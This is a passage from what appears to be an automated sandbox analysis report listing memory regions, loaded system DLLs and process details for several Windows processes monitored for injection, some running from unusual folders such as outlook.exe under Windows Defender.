name = "pagefile_0x00000000004f0000" filename = "" Region: id = 3436 start_va = 0x680000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 3437 start_va = 0x810000 end_va = 0x8eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 3438 start_va = 0x970000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 3439 start_va = 0x9b0000 end_va = 0xb11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 3440 start_va = 0x1170000 end_va = 0x1186fff monitored = 0 entry_point = 0x11714a1 region_type = mapped_file name = "notepad.exe" filename = "\\Program Files\\Windows Photo Viewer\\notepad.exe" (normalized: "c:\\program files\\windows photo viewer\\notepad.exe") Region: id = 3441 start_va = 0x1190000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 3442 start_va = 0x2590000 end_va = 0x2f53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 3443 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3444 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3445 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3446 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3447 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3448 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3449 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3450 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3451 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3452 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3453 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3454 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3455 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3456 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3457 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3458 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3459 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3460 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3461 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3462 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3463 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3464 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3465 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3466 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3467 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3468 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3469 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3470 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3471 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3472 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3473 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3474 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Thread: id = 180 os_tid = 0x7d8 Process: id = "27" image_name = "operamail.exe" filename = "c:\\program files (x86)\\microsoft office\\operamail.exe" page_root = "0x4d408000" os_pid = "0xc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\operamail.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3475 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3476 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3477 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3478 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3479 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3480 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3481 start_va = 0xc0000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3482 start_va = 0x100000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3483 start_va = 0x220000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3484 start_va = 0x2b0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 3485 start_va = 0x3b0000 end_va = 0x48efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 3486 start_va = 0x4d0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3487 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 3488 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3489 start_va = 0x9d0000 end_va = 0x9e6fff monitored = 0 entry_point = 0x9d14a1 region_type = mapped_file name = "operamail.exe" filename = "\\Program Files (x86)\\Microsoft Office\\operamail.exe" (normalized: "c:\\program files (x86)\\microsoft office\\operamail.exe") Region: id = 3490 start_va = 0x9f0000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 3491 start_va = 0xb80000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 3492 start_va = 0x2110000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 3493 start_va = 0x2150000 end_va = 0x2b13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 3494 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3495 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3496 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3497 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3498 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3499 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3500 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3501 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3502 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3503 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3504 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3505 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3506 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3507 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3508 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3509 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3510 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3511 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3512 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3513 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3514 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3515 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3516 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3517 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3518 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 3519 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 3520 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 3521 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 3522 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3523 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3524 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3525 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3527 start_va = 0x5d0000 end_va = 0x6d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Thread: id = 181 os_tid = 0x5a8 Process: id = "28" image_name = "outlook.exe" filename = "c:\\program files\\windows defender\\outlook.exe" page_root = "0x4d00e000" os_pid = "0x874" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\Windows Defender\\outlook.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3528 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3529 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3530 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3531 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3532 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3533 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3534 start_va = 0x80000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3535 start_va = 0x180000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3536 start_va = 0x1c0000 end_va = 0x226fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3537 start_va = 0x230000 end_va = 0x30efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3538 start_va = 0x330000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3539 start_va = 0x490000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 3540 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3541 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3542 start_va = 0x620000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 3543 start_va = 0x7b0000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3544 start_va = 0xd80000 end_va = 0xd96fff monitored = 0 entry_point = 0xd814a1 region_type = mapped_file name = "outlook.exe" filename = "\\Program Files\\Windows Defender\\outlook.exe" (normalized: "c:\\program files\\windows defender\\outlook.exe") Region: id = 3545 start_va = 0xda0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 3546 start_va = 0x21a0000 end_va = 0x2b63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 3547 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3548 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3549 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3550 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3551 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3552 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3553 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3554 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3555 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3556 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 3557 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3558 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3559 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3560 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3561 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3562 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3563 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3564 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3565 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3566 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 3567 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 3568 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3569 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3570 start_va = 0x778c0000 end_va = 0x77a3ffff 